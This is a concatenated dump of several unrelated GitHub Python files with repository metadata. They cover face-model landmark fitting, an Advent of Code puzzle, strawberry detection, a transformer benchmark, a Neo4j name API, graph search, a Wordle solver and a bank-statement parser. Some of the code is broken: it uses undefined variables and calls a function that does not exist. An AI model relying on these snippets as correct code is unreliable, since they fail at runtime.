torch.tensor([\n# [torch.cos(y_rad), 0., torch.sin(y_rad), 0.],\n# [0., 1., 0., 0.],\n# [-torch.sin(y_rad), 0., torch.cos(y_rad), 0.],\n# [0., 0., 0., 1.],\n# ]).float()\n# return R\n\n\n# def viewport_matrix(l=-1, r=1, t=1, b=-1):\n# \"\"\"\n# viewport matrix: http://glasnost.itcarlow.ie/~powerk/GeneralGraphicsNotes/projection/viewport_transformation.html\n# @param l: left\n# @param r: right\n# @param t: top\n# @param b: bottom\n# \"\"\"\n# w = r - l\n# h = t - b\n# V = .5 * torch.tensor([\n# [w, 0., 0., 0.],\n# [0., h, 0., 0.],\n# [0., 0., 1., 0.],\n# [r + l, t + b, 1., 2.],\n# ])\n# return V\n\n# def perspective_matrix(t, b, l, r, n, f):\n# \"\"\"\n# perspective projection matrix: https://bit.ly/300gYmf\n# @param t: top\n# @param b: bottom\n# @param l: left\n# @param r: right\n# @param n: near\n# @param f: far\n# \"\"\"\n# w = r - l\n# h = t - b\n# P = torch.tensor([\n# [2. * n / w, 0., 0., 0.],\n# [0., 2. * n / h, 0., 0.],\n# [(r + l) / w, (t + b) / h, -(f + n) / (f - n), -1.],\n# [0., 0., -2. * f * n / (f - n), 0.],\n# ])\n# return P\n\n\n# def project_points(S, near, R):\n# \"\"\"project points following equation 2\"\"\"\n# P = perspective_matrix(1, -1, 1, -1, near, 100)\n# ones = torch.ones((S.shape[0], 1))\n# S = torch.cat((S, ones), dim=1)\n# V = viewport_matrix()\n# p = V.t() @ P.t() @ R @ S.t()\n# return p.t()\n\n\n# # project_face(torch.tensor([[1, 2, 3]]).float(), torch.tensor(90).float(), torch.tensor((0, 0, -200)))\n# def project_face(G, omega, t):\n# (num_points, _) = G.shape\n# S = torch.cat((G.t(), torch.ones((1, num_points))))\n# R = rotation_matrix_y(omega)\n# G_ = (R @ S)[:3].t()\n# # R[3, 0:3] = t\n# R = torch.cat((R[:3], torch.cat((t.float(), torch.tensor([1.]))).float().unsqueeze(dim=-1).t()))\n# points = project_points(G_, near=1, R=R)\n# return points\n\n\nclass Model(nn.Module):\n\n def __init__(self, ground_truth, identity, expression, alpha=None, lambda_alpha=0.5, lambda_delta=0.5):\n super(Model, self).__init__()\n (n, _, _) = ground_truth.shape\n self.n = n\n\n # data\n self.ground_truth = ground_truth.float()\n self.identity = identity\n self.expression = expression\n\n # hyper-parameters\n # TODO: Select hyper parameters such that α and δ to be obtained in a proper range. Report findings.\n self.lambda_alpha = lambda_alpha\n self.lambda_delta = lambda_delta\n\n # weight parameters\n # initializing transformation parameters ω and t closer to the solution may help with convergence. For example translation over z dimension can be set to be -400 in the case of projection matrix with principal point {W2, H2} and fovy = 0.5.\n # TODO: give np.random.uniform dimensions everywhere else as well?\n self.alpha = alpha or nn.Parameter(torch.tensor(np.random.uniform(-1.0, 1.0, 30)).float())\n self.delta = nn.Parameter(torch.tensor(np.random.uniform(-1.0, 1.0, (n, 20))).float())\n self.omega = nn.Parameter(torch.tensor(np.random.uniform(0.0, 10.0, n)))\n self.t = nn.Parameter(torch.cat((\n # x/y\n torch.tensor(np.random.uniform(-1.0, 1.0, (2, n))),\n # z\n torch.tensor(np.random.uniform(-400.0, 100.0, (1, n))),\n )))\n\n # , ground_truth, identity, expression, alpha, delta, omega, t\n def forward(self):\n \"\"\"calculate the loss for a specific 2D image with a human face\"\"\"\n\n # self.G = reconstruct_face(self.identity, self.expression, self.alpha, self.delta)\n\n # geom = self.identity .sample(self.alpha)\n geom = torch.tensor(self.identity.mean) + torch.tensor(self.identity.pc) @ (self.alpha * torch.sqrt(torch.tensor(self.identity.std)))\n\n L_fits = torch.zeros(self.n)\n self.points = torch.zeros(self.n, 68, 4)\n for i in range(self.n):\n # expr = self.expression.sample(self.delta)\n expr = torch.tensor(self.expression.mean) + torch.tensor(self.expression.pc) @ (self.delta[i] * torch.sqrt(torch.tensor(self.expression.std)))\n G = geom + expr\n\n # self.points[i] = project_face(G, self.omega[i], self.t[:, i])\n\n R_l = construct_R(0, 10, 0)\n geo_l = apply_transform(geo, R_l)\n im_l = geo_to_im(geo_l, texture, triangles)\n resolution = tuple(im_l.shape[:2][::-1])\n M = construct_obj_to_cam(self.omega[i], self.t[:, i], resolution)\n self.points[i] = apply_transform(G, M)\n\n # Given 68 ground truth facial landmarks the following energy can be optimized: Lfit=Llan+Lreg(3)Llan=68∑j=1∥∥pkibj−lj∥∥22(4)where pkj is a 2D projection of a landmark point kj from Landmarks68_model2017-1_face12_nomouth.anl and lj is its ground truth 2D coordinate.\n L_lan = (self.points[i, :, 0:2] - self.ground_truth[i]).norm().pow(2).sum()\n # We regularize the model using Tikhonov regularization to enforce the model to predict faces closer to the mean: Lreg=λalpha30∑i=1α2i+λdelta20∑i=1δ2i(5)\n L_reg = (self.lambda_alpha * self.alpha).pow(2).sum() + (self.lambda_delta * self.delta[i]).pow(2).sum()\n L_fit = L_lan + L_reg\n L_fits[i] = L_fit\n return L_fits.mean()\n\ndef train_model(model):\n lr = 0.1\n optimizer = torch.optim.Adam(model.parameters(), lr=lr)\n # - Assuming α, δ, ω, t to be latent parameters of your model optimize an Energy described above using Adam optimizer until convergence.\n prev_loss = 0\n for i in trange(10000):\n optimizer.zero_grad()\n loss = model.forward()\n print(i, loss)\n loss.backward()\n optimizer.step()\n if (abs(prev_loss - loss.item()) < 0.1):\n print(\"converged\")\n break\n prev_loss = loss.item()\n return model\n\ndef estimate_points(files, identity, expression):\n # landmarks = file_landmarks(f)\n landmarks_pics = torch.stack(list(map(lambda f: torch.tensor(file_landmarks(f)), files)))\n # (n, m, xy)\n # print(landmarks)\n model = Model(landmarks_pics, identity, expression)\n model = train_model(model)\n # print(model)\n return model\n\ndef load_morphace():\n # - Landmarks are a subset of vertices from the morphable model (indexes are defined by the annotation file provided), that's why you are inferring landmarks.\n # load data, filter to 68 landmarks\n # TODO: does this clash with the 30/20 filter?\n vertex_idxs = load_landmarks()\n (texture, identity, expression, triangles) = load_data()\n for pca in (identity, expression, texture):\n pca.mean = pca.mean[vertex_idxs]\n pca.pc = pca.pc [vertex_idxs]\n return (texture, identity, expression, triangles)\n\nif __name__ == \"__main__\":\n (texture, identity, expression, triangles) = load_morphace()\n\n # get pic landmarks\n faces_folder_path = 'pics'\n files = glob.glob(os.path.join(faces_folder_path, \"*.jpg\"))\n # landmarks = file_landmarks(f)\n # ground_truths = list(map(file_landmarks, tqdm(files)))\n models = list(map(lambda f: estimate_points([f], identity, expression), tqdm(files)))\n\n landmarks_pics = [x.points.detach().numpy().squeeze() for x in models]\n\n # Visualize predicted landmarks overlayed on ground truth.\n for landmarks, fpath in zip(landmarks_pics, files):\n ground_truth = file_landmarks(fpath)\n print('plotting')\n plot_landmarks([ground_truth, landmarks])\n print('plotted')\n plt.savefig('results/estimation_' + os.path.basename(fpath))\n\n alpha = models[0].alpha.detach().numpy()\n delta = models[0].delta.detach().numpy()\n print(alpha, delta)","repo_name":"KiaraGrouwstra/CV2_Assignment3","sub_path":"latent_param_estimation.py","file_name":"latent_param_estimation.py","file_ext":"py","file_size_in_byte":11211,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"30484469857","text":"from functools import total_ordering\nfrom utils import parse\nimport ast\nimport math\nfrom functools import cmp_to_key\n\n\ndef is_lower(f, s):\n # both integer\n if type(f) == int and type(s) == int:\n return (f < s) - (f > s)\n # both list\n if type(f) == list and type(s) == list:\n for a, b in zip(f, s):\n comp = is_lower(a, b)\n if comp:\n return comp\n return (len(f) < len(s)) - (len(f) > len(s))\n # int and list\n if type(f) == int and type(s) == list:\n return is_lower([f], s)\n if type(f) == list and type(s) == int:\n return is_lower(f, [s])\n\n\ndef day13_1():\n data = parse(13)\n res = 0\n for p, i in enumerate(range(0, len(data), 3)):\n first = ast.literal_eval(data[i])\n second = ast.literal_eval(data[i + 1])\n\n if is_lower(first, second) == 1:\n res += p + 1\n return res\n\n\nprint(day13_1())\n\n\ndef day13_2():\n dividers = [[[2]], [[6]]]\n packets = [ast.literal_eval(row) for row in parse(13) if row] + dividers\n packets.sort(key=cmp_to_key(is_lower), reverse=True)\n return math.prod(packets.index(x) + 1 for x in dividers)\n\n\nprint(day13_2())\n","repo_name":"zhugejun/Advent_of_Code","sub_path":"2022/python/day_13.py","file_name":"day_13.py","file_ext":"py","file_size_in_byte":1181,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"40847616942","text":"import os\nimport torch\nimport torchvision\nfrom torchvision.models.detection.faster_rcnn import FastRCNNPredictor\nfrom torchvision.models.detection.mask_rcnn import MaskRCNNPredictor\nimport cv2\nimport numpy as np\nimport math\nfrom PIL import Image\nfrom torchvision import transforms as T\n \n\n\ndef init_model():\n num_classes = 2\n model = __get_instance_segmentation_model(num_classes)\n model.load_state_dict(torch.load('rcnn_demo.pt'))\n model.eval()\n return model\n\ndef crop_image(img, x1, y1, x2, y2):\n min_x = min(x1, x2)\n max_x = max(x1, x2)\n min_y = min(y1, y2)\n max_y = max(y1, y2)\n return img[min_y:max_y, min_x:max_x]\n\ndef distance(c1, c0):\n r1, g1, b1 = map(lambda x: x / 255.0, c1)\n r2, g2, b2 = map(lambda x: x / 255.0, c0)\n distance = math.sqrt((r2-r1)**2+(g2-g1)**2+(b2-b1)**2)\n return distance\n\ndef ripeness(mean_color):\n ripe_color = (136, 23, 13)\n ripeness = min(1.0, (1.0 - distance(ripe_color, mean_color)) / 0.9)\n return ripeness\n\ndef crop_image(img, x1, y1, x2, y2):\n min_x = min(x1, x2)\n max_x = max(x1, x2)\n min_y = min(y1, y2)\n max_y = max(y1, y2)\n return img[min_y:max_y, min_x:max_x, :]\n\ndef unique_count_app(a):\n colors, count = np.unique(a.reshape(-1,a.shape[-1]), axis=0, return_counts=True)\n return colors[count.argmax()]\n\ndef strawberry_ripeness(img):\n img = crop_image(img, int(img.shape[0]/3), int(img.shape[1]/3), int(2*img.shape[0]/3), int(2*img.shape[1]/3))\n img_hsv = cv2.cvtColor(img, cv2.COLOR_RGB2HSV)\n color = unique_count_app(img)\n return ripeness(color)\n \ndef detect_strawsberry(picture_path, model):\n print('Loaded')\n \n img = __load_img(picture_path)\n img.max()\n \n transforms = T.Compose([T.ToPILImage(),\n T.Resize((512, 512)),\n T.ToTensor()])\n \n img_tensor = transforms(img)\n \n with torch.no_grad():\n prediction = model(img_tensor[None])\n \n scale1 = img.shape[1] / img_tensor.shape[2]\n scale2 = img.shape[0] / img_tensor.shape[1]\n print(scale1, scale2)\n \n # draw results\n res = img.astype(np.uint8).copy()\n \n boxes = prediction[0]['boxes']\n scores = prediction[0]['scores']\n print(boxes, scores)\n \n font = cv2.FONT_HERSHEY_SIMPLEX\n fontScale = 1.0\n fontColor = (255, 0, 0)\n thickness = 1\n lineType = 1\n \n for box, score in zip(boxes, scores):\n x1, y1, x2, y2 = box.cpu().numpy()\n # upscale\n x1 *= scale1\n x2 *= scale1\n y1 *= scale2\n y2 *= scale2\n if score > 0.9:\n p1 = int(x1), int(y1)\n p2 = int(x2), int(y2)\n cv2.rectangle(res, p1, p2, (int(255 * score), 0, 0), 2)\n ripeness = strawberry_ripeness(crop_image(res, int(x1), int(y1), int(x2), int(y2)))\n cv2.putText(res, f\"{ripeness:.3f}\",\n p1,\n font,\n fontScale,\n fontColor,\n thickness,\n lineType)\n \n filename, ext = os.path.splitext(picture_path)\n Image.fromarray(res).save(filename + '_detected.jpeg')\n return filename + '_detected.jpeg'\n \n \ndef __get_instance_segmentation_model(num_classes):\n # load an instance segmentation model pre-trained on COCO\n model = torchvision.models.detection.maskrcnn_resnet50_fpn(pretrained=True)\n \n # get number of input features for the classifier\n in_features = model.roi_heads.box_predictor.cls_score.in_features\n # replace the pre-trained head with a new one\n model.roi_heads.box_predictor = FastRCNNPredictor(in_features, num_classes)\n \n # now get the number of input features for the mask classifier\n in_features_mask = model.roi_heads.mask_predictor.conv5_mask.in_channels\n hidden_layer = 256\n # and replace the mask predictor with a new one\n model.roi_heads.mask_predictor = MaskRCNNPredictor(in_features_mask,\n hidden_layer,\n num_classes)\n return model\n \n \ndef __load_img(path):\n img = Image.open(path).convert('RGB')\n return np.array(img)\n\nmodel = init_model()","repo_name":"InnokentyDM/strawberry-hack","sub_path":"app/ml.py","file_name":"ml.py","file_ext":"py","file_size_in_byte":4207,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"17826357531","text":"import math\n\nimport torch\nimport torch.nn as nn\n\nfrom fairscale.nn.moe.moe_layer import MOELayer\nfrom fairscale.nn.moe.top2gate import Top2Gate\n\n\n# TODO(anj-s): Identify if we need this initialization logic for the below wrapped layers.\nclass EmbeddingLayer(nn.Embedding):\n \"\"\"Wrapped nn.Embedding layer to allow for weight initialization.\"\"\"\n\n def __init__(self, ntoken, ninp, initrange):\n super().__init__(ntoken, ninp)\n self.ninp_sqrt = math.sqrt(ninp)\n self.weight.data.uniform_(-initrange, initrange)\n\n def forward(self, src):\n return super().forward(src) * self.ninp_sqrt\n\n\nclass PositionalEncodingLayer(nn.Module):\n \"\"\"PositionalEncoding layer for a given Transformer model.\"\"\"\n\n def __init__(self, d_model, dropout=0.1, max_len=5000):\n super(PositionalEncodingLayer, self).__init__()\n self.dropout = nn.Dropout(p=dropout)\n\n pe = torch.zeros(max_len, d_model)\n position = torch.arange(0, max_len, dtype=torch.float).unsqueeze(1)\n div_term = torch.exp(torch.arange(0, d_model, 2).float() * (-math.log(10000.0) / d_model))\n pe[:, 0::2] = torch.sin(position * div_term)\n pe[:, 1::2] = torch.cos(position * div_term)\n pe = pe.unsqueeze(0).transpose(0, 1)\n self.register_buffer(\"pe\", pe)\n\n def forward(self, x):\n x = x + self.pe[: x.size(0), :]\n return self.dropout(x)\n\n\nclass FeedForwardLayer(nn.Module):\n \"\"\"FeedForward layer for a given Transformer model.\"\"\"\n\n def __init__(self, d_model, dim_feedforward, activation, dropout) -> None:\n super(FeedForwardLayer, self).__init__()\n self.linear1 = nn.Linear(d_model, dim_feedforward)\n self.activation = activation\n self.dropout1 = nn.Dropout(dropout)\n self.linear2 = nn.Linear(dim_feedforward, d_model)\n self.dropout2 = nn.Dropout(dropout)\n\n def forward(self, x):\n return self.dropout2(self.linear2(self.dropout1(self.activation(self.linear1(x)))))\n\n\n# Forked from https://pytorch.org/docs/stable/_modules/torch/nn/modules/transformer.html#TransformerEncoderLayer.\n# Parameters is_moe and num_local_experts are added.\nclass TransformerEncoderLayer(nn.Module):\n r\"\"\"TransformerEncoderLayer is made up of self-attn and feedforward network.\n This standard encoder layer is based on the paper \"Attention Is All You Need\".\n Ashish Vaswani, Noam Shazeer, Niki Parmar, Jakob Uszkoreit, Llion Jones, Aidan N Gomez,\n Lukasz Kaiser, and Illia Polosukhin. 2017. Attention is all you need. In Advances in\n Neural Information Processing Systems, pages 6000-6010. Users may modify or implement\n in a different way during application.\n\n Args:\n d_model: the number of expected features in the input (required).\n nhead: the number of heads in the multiheadattention models (required).\n dim_feedforward: the dimension of the feedforward network model (default=2048).\n dropout: the dropout value (default=0.1).\n activation: the activation function of the intermediate layer, can be a string\n (\"relu\" or \"gelu\") or a unary callable. Default: relu\n layer_norm_eps: the eps value in layer normalization components (default=1e-5).\n norm_first: if ``True``, layer norm is done prior to attention and feedforward\n operations, respectivaly. Otherwise it's done after. Default: ``False`` (after).\n is_moe: if ``True``, the feedforward layer will have MOE enabled.\n num_local_experts: number of local experts for MOE.\n\n\n Examples::\n >>> encoder_layer = nn.TransformerEncoderLayer(d_model=512, nhead=8)\n >>> src = torch.rand(10, 32, 512)\n >>> out = encoder_layer(src)\n \"\"\"\n __constants__ = [\"norm_first\"]\n\n def __init__(\n self,\n d_model,\n nhead,\n dim_feedforward=2048,\n dropout=0.1,\n activation=nn.ReLU(),\n layer_norm_eps=1e-5,\n norm_first=False,\n is_moe=False,\n num_local_experts=1,\n ):\n super(TransformerEncoderLayer, self).__init__()\n self.self_attn = nn.MultiheadAttention(d_model, nhead, dropout=dropout)\n self.norm_first = norm_first\n self.norm1 = nn.LayerNorm(d_model, eps=layer_norm_eps)\n self.norm2 = nn.LayerNorm(d_model, eps=layer_norm_eps)\n self.dropout = nn.Dropout(dropout)\n\n self.is_moe = is_moe\n if is_moe:\n world_size = 1 if not torch.distributed.is_initialized() else torch.distributed.get_world_size()\n num_global_experts = num_local_experts * world_size\n self.gate = Top2Gate(d_model, num_global_experts)\n experts = nn.ModuleList(\n [FeedForwardLayer(d_model, dim_feedforward, activation, dropout) for _ in range(num_local_experts)]\n )\n self.moe_layer = MOELayer(self.gate, experts)\n else:\n self.ff_block = FeedForwardLayer(d_model, dim_feedforward, activation, dropout)\n\n def forward(self, src, src_mask=None, src_key_padding_mask=None):\n r\"\"\"Pass the input through the encoder layer.\n\n Args:\n src: the sequence to the encoder layer (required).\n src_mask: the mask for the src sequence (optional).\n src_key_padding_mask: the mask for the src keys per batch (optional).\n\n Shape:\n see the docs in Transformer class.\n \"\"\"\n\n # see Fig. 1 of https://arxiv.org/pdf/2002.04745v1.pdf\n\n x = src\n if self.norm_first:\n x = x + self._sa_block(self.norm1(x), src_mask, src_key_padding_mask)\n x = x + self._ff_block(self.norm2(x))\n else:\n x = self.norm1(x + self._sa_block(x, src_mask, src_key_padding_mask))\n x = self.norm2(x + self._ff_block(x))\n\n return x\n\n # self-attention block\n def _sa_block(self, x, attn_mask, key_padding_mask):\n x = self.self_attn(x, x, x, attn_mask=attn_mask, key_padding_mask=key_padding_mask, need_weights=False)[0]\n return self.dropout(x)\n\n # feed forward block\n def _ff_block(self, x):\n if self.is_moe:\n return self.moe_layer(x)\n else:\n return self.ff_block(x)\n\n\nclass TransformerDecoderLayer(TransformerEncoderLayer):\n \"\"\"TransformerDecoder layer which inherits from TransformerEncoderLayer.\"\"\"\n\n def __init__(self, ninp, nhead, nhid, dropout, is_moe=False, num_local_experts=1):\n super().__init__(ninp, nhead, nhid, dropout, is_moe=is_moe, num_local_experts=num_local_experts)\n self.src_mask = None\n\n def _generate_square_subsequent_mask(self, sz):\n mask = (torch.triu(torch.ones(sz, sz)) == 1).transpose(0, 1)\n mask = mask.float().masked_fill(mask == 0, float(\"-inf\")).masked_fill(mask == 1, float(0.0))\n return mask\n\n def forward(self, src):\n # TODO(anj-s): Fix the data format so that we have [seq_len, batch_size, embedding dim].\n # Currently real data has seq_len as the second dimension and batch_size as the first dimension.\n # We need to mask the sequence length dimension and not the batch size.\n if self.src_mask is None or self.src_mask.size(0) != len(src):\n device = src.device\n mask = self._generate_square_subsequent_mask(len(src)).to(device)\n self.src_mask = mask\n\n return super().forward(src, self.src_mask)\n\n\nclass LinearLayer(nn.Linear):\n \"\"\"Wrapped nn.Linear layer to allow for weight initialization.\"\"\"\n\n def __init__(self, ninp, ntoken, initrange):\n super().__init__(ninp, ntoken)\n self.bias.data.zero_()\n self.weight.data.uniform_(-initrange, initrange)\n\n\nclass TransformerLM(nn.Sequential):\n \"\"\"A GPT-2 based nn.Sequential language model.\"\"\"\n\n def __init__(self, ntokens, ninp, nhead, nhid, dropout, initrange, ndecoder, is_moe=False, num_local_experts=1):\n layers = [\n EmbeddingLayer(ntokens, ninp, initrange),\n PositionalEncodingLayer(ninp, dropout),\n ]\n for _ in range(ndecoder):\n layers.append(TransformerDecoderLayer(ninp, nhead, nhid, dropout, is_moe, num_local_experts))\n\n layers.append(LinearLayer(ninp, ntokens, initrange))\n super(TransformerLM, self).__init__(*layers)\n","repo_name":"facebookresearch/fairscale","sub_path":"benchmarks/models/transformer_lm.py","file_name":"transformer_lm.py","file_ext":"py","file_size_in_byte":8244,"program_lang":"python","lang":"en","doc_type":"code","stars":2639,"dataset":"github-code","pt":"72"} +{"seq_id":"13419319857","text":"import shareds\r\nfrom bl.dates import DateRange\r\n\"\"\"\r\nhttps://isotammi.net/api/v0/search?lookfor=Pekka\r\n--> {\"status\":\"OK\",\r\n \"statusText\":\"OK\",\r\n \"resultCount\": 2,\r\n \"records\":[ { \"id\":\"123\", \"name\":\"Antrea\", \"type\":\"place\"},\r\n { \"id\":\"333\", \"name\":\"Antrea\", \"type\":\"village\"},\r\n ]\r\n }\r\n\r\n \r\n\"\"\"\r\nimport pprint\r\n\r\ncypher_search_refname = \"\"\"\r\nMATCH (p:Refname {name: $lookfor}) --> (b:Refname)\r\nRETURN b.name as refname\r\n\"\"\"\r\n\r\ncypher_fetch_namefamily = \"\"\"\r\nMATCH (n:Refname {name:$lookfor})\r\nOPTIONAL MATCH (n) --> (m:Refname)\r\nWITH COALESCE(m, n) AS base\r\nOPTIONAL MATCH (base) <-- (o:Refname)\r\nRETURN [base.name] + COLLECT(o.name) AS namefamily\r\n\"\"\"\r\n\r\n\r\ndef search_refname(rname):\r\n# print(f\"Looking for basename of name {rname}\")\r\n result = shareds.driver.session().run(cypher_search_refname, lookfor=rname).single()\r\n if not result: \r\n return dict(status=\"Not found\",statusText=\"Not found\",resultCount=0)\r\n records = []\r\n for rec in result:\r\n p = rec['p']\r\n records.append(p)\r\n \r\n# records.append(surroundedBy=sorted(places1,key=lambda x:x['name'])) \r\n return {\"status\":\"OK\",\r\n \"statusText\":\"OK\",\r\n \"resultCount\": len(records),\r\n \"records\": records,\r\n }\r\n\r\n\r\ndef fetch_namefamily(rname):\r\n# print(f\"Getting name family of {rname}\")\r\n result = shareds.driver.session().run(cypher_fetch_namefamily, lookfor=rname)\r\n if not result:\r\n# print(f\"namefamily for {rname} not found\") \r\n return dict(status=\"Not found\",statusText=\"Not found\",resultCount=0)\r\n for rec in result:\r\n namefamily = rec['namefamily']\r\n# print(namefamily)\r\n return {\"status\":\"OK\",\r\n \"statusText\":\"OK\",\r\n \"resultCount\": 1,\r\n \"record\": namefamily, \r\n }\r\n# print(f\"No namefamily in result for {rname} found\") \r\n return dict(status=\"Not found\",statusText=\"Not found\",resultCount=0) \r\n\r\n","repo_name":"Taapeli/stk-upload","sub_path":"app/bp/api/refnameapi.py","file_name":"refnameapi.py","file_ext":"py","file_size_in_byte":1970,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"72"} +{"seq_id":"21975114843","text":"from collections import defaultdict\ngraph = defaultdict(list)\n\ng = {'A': ['B', 'C'],\n 'B': ['E', 'D'],\n 'C': ['F', 'G'],\n 'D': ['H','I'],\n 'E': ['I'],\n 'F': ['I'],\n 'G': ['J'],\n 'J': ['I'],\n 'I': ['H']}\n\nfor i in g:\n graph[i] = g[i]\n#DFS\ndef find_path_dfs(graph, start, end, path=[]):\n path = path + [start] #see comment at bottom\n if start == end:\n return path\n if start not in graph:\n return None\n for next_node in graph[start]:\n if next_node not in path:\n new_path = find_path(graph, next_node, end, path)\n if new_path:\n return new_path\n return None\n\ndef find_all_paths_bfs(graph, start, end, stack=[]):\n temp_path = [start]\n stack.append(temp_path)\n while stack:\n temp_path = stack.pop(0)\n last_node = temp_path[-1]\n if last_node==end:\n print(\"Valid Path\", temp_path)\n children = graph[last_node]\n for i in children:\n if i not in temp_path:\n new_path = temp_path + [i]\n\n stack.append(new_path)\n\n\n\n\ndef find_all_paths(graph, start, end, path=[]):\n path = path + [start] #see comment at bottom\n if start == end:\n return [path]\n if start not in graph:\n return []\n paths = []\n for next_node in graph[start]:\n if next_node not in path:\n new_paths = find_all_paths(graph, next_node, end, path)\n for new_path in new_paths:\n paths.append(new_path)\n return paths\n\n\n\nprint(find_all_paths_bfs(graph, 'A', 'I'))\n\n# print(find_path(graph, 'A', 'D'))\n# print(find_all_paths(graph, 'A', 'D '))\n\n'''\nIf we had written \"path.append(start)\" instead, we would have\nmodified the variable 'path' in the caller, with disastrous results.\n'''\n","repo_name":"pyaf/hackerrank","sub_path":"data_structure/graph.py","file_name":"graph.py","file_ext":"py","file_size_in_byte":1803,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"35877634715","text":"import random\n\n\nwith open('possible_words.txt') as f:\n\tpossible = [word.strip() for word in f];\n\nwith open('allowed_words.txt') as f:\n\tallowed = {word.strip() for word in f};\n\ndef choose_solution():\n\treturn random.choice(possible)\n\ndef check_guess(guess, solution):\n\tresult = \"\"\n\tfor x,y in zip(guess,solution):\n\t\tif x==y:\n\t\t\tresult += 'G'\n\t\telif x in solution:\n\t\t\tresult += 'Y'\n\t\telse:\n\t\t\tresult += 'X'\n\treturn result\n\nclass Guesser:\n\tdef __init__(self, allowed):\n\t\tself.words = [x for x in allowed]\n\n\tdef possible(self, clue, last_guess, word):\n\t\tcheck = True\n\t\tfor i,x in enumerate(clue):\n\t\t\tif x=='G':\n\t\t\t\tif word[i] != last_guess[i]:\n\t\t\t\t\tcheck = False\n\t\t\telif x == 'Y':\n\t\t\t\tif last_guess[i] not in word or word[i]==last_guess[i]:\n\t\t\t\t\tcheck = False\n\t\t\telif x == 'X':\n\t\t\t\tif last_guess[i] in word:\n\t\t\t\t\tcheck = False\n\t\treturn check\n\n\tdef make_guess(self, clue, last_guess):\n\t\tif not clue:\n\t\t\treturn random.choice(self.words)\n\t\tself.words = [word for word in self.words if self.possible(clue, last_guess, word)]\n\t\treturn random.choice(self.words)\n\n#print(choose_solution())\ndef make_attempt(clue, tried):\n\tif not clue:\n\t\tcandidate = [x for x in allowed]\n\t\treturn random.choice(candidate)\n\treturn random.choice(possible)\n\n\ndef play_game():\n\tanswer = choose_solution()\n\t# attempt = input(\"Enter guess: \")\n\t# print(attempt)\n\tguesses = []\n\tai = Guesser(allowed)\n\tclue = \"\"\n\tattempt = \"\"\n\tfor x in range(6):\n\t\t# attempt = \"\"\n\t\t# while attempt in guesses or attempt not in allowed:\n\t\t# \tattempt = input(\"Enter guess: \")\n\t\t# print(attempt, \"accepted\")\n\t\tattempt = ai.make_guess(clue, attempt)\n\t\tguesses += [attempt]\n\n\t\t# print(guesses)\n\t\tresult = check_guess(attempt, answer)\n\t\tclue = result\n\t\t# print (result)\n\n\t\tif attempt == answer:\n\t\t\t# print(\"Correct\")\n\t\t\treturn True, len(guesses)\n\t\t\tbreak\n\t\t# else:\n\t\t\t# print(\"Try again\")\n\t# print(\"Solution\", answer)\n\treturn False, 0\n\ncorrect = 0\ntotal_tries = 0\nfor x in range(100):\n\twin, tries = play_game()\n\tif win:\n\t\tcorrect += 1\n\t\ttotal_tries += tries\n\nprint(correct,\"guessed out of 100\")\nprint(total_tries/correct,'average guesses')","repo_name":"nathanianah/GWS","sub_path":"solver.py","file_name":"solver.py","file_ext":"py","file_size_in_byte":2077,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"32062660666","text":"# ===============================================================================\n# e02_2DOF_RR_robot.py\n#\n# A simple example for drawing a RR robot\n#\n# Author(s):\n# Seied Muhammad Yazdian\n#\n# Last update:\n# Feb 3, 2022\n# ===============================================================================\n\nimport numpy as np\nimport roboticlib_path\nimport roboticlib as rl\nimport matplotlib.pyplot as plt\nimport graphiclib_path\nimport graphiclib as gl\n\nshow_plots = True\n\n\ndef main():\n LINK1 = 3.0\n LINK2 = 2.0\n\n theta_1 = 10.0\n theta_2 = 20.0\n\n frame_00 = rl.rotation_matrix_z(0.0)\n frame_01 = rl.rotation_matrix_z(theta_1)\n frame_12 = rl.rotation_matrix_z(theta_2)\n frame_02 = np.matmul(frame_01, frame_12)\n\n p0 = np.array([0, 0, 0])\n p1 = np.matmul(frame_01, np.array([LINK1, 0, 0]))\n p2 = np.matmul(frame_01, np.array(\n [LINK1, 0, 0] + np.matmul(frame_12, np.array([LINK2, 0, 0]))))\n\n trans_01 = rl.transformation_matrix(0, 1, 0, -10)\n\n # Display contents\n fig = plt.figure()\n ax = plt.axes(projection='3d')\n gl.draw_generic_3d(ax, 'frame', frame_00, position=p0)\n gl.draw_generic_3d(ax, 'frame', frame_01, position=p1)\n gl.draw_generic_3d(ax, 'frame', frame_02, position=p2)\n plt.plot((p0[0], p1[0]), (p0[1], p1[1]), (p0[2], p1[2]), 'k')\n plt.plot((p1[0], p2[0]), (p1[1], p2[1]), (p1[2], p2[2]), 'k')\n gl.draw_generic_3d(ax, 'trans', trans_01)\n gl.set_axes_equal_3d(ax)\n if show_plots:\n plt.show()\n\n\nif __name__ == '__main__':\n main()\n","repo_name":"Muhammad-Yazdian/Python-for-Mechanical-Engineers","sub_path":"Robotics/examples/e02_2DOF_RR_robot.py","file_name":"e02_2DOF_RR_robot.py","file_ext":"py","file_size_in_byte":1526,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"25827501509","text":"\n# coding: utf-8\n\n# In[127]:\n\n\nimport pandas as pd\nimport tabula\n\n\n# In[61]:\n\n\nstatement='ICICI_Statement_6months.pdf'\n\n\n# In[62]:\n\n\nbank_st=tabula.read_pdf(statement,pages='all', pandas_options={'header': None})\n\n\n# In[63]:\n\n\nprint(type(bank_st), len(bank_st))\ntype(bank_st[0])\n\n\n# In[64]:\n\n\nbk0 = bank_st[0]\nprint(type(bk0),len(bk0))\n\n\n# In[65]:\n\n\nbk0.head(10)\n\n\n# In[95]:\n\n\ncnt = len(bank_st)\ntotal_state =bank_st[0].append(bank_st[1:cnt])\n\n\n# In[97]:\n\n\ntotal_state.info()\n\n\n# In[98]:\n\n\ntotal_state.shape\n\n\n# In[99]:\n\n\ntotal_state\n\n\n# In[100]:\n\n\ntotal_state.reset_index(inplace = True,drop = True)\n\n\n# In[101]:\n\n\ntotal_state\n\n\n# In[102]:\n\n\ntotal_state = total_state.drop([0], axis=1)\n\n\n# In[103]:\n\n\ntotal_state.head()\n\n\n# In[104]:\n\n\ntotal_state.rename(columns={1: 'Date', 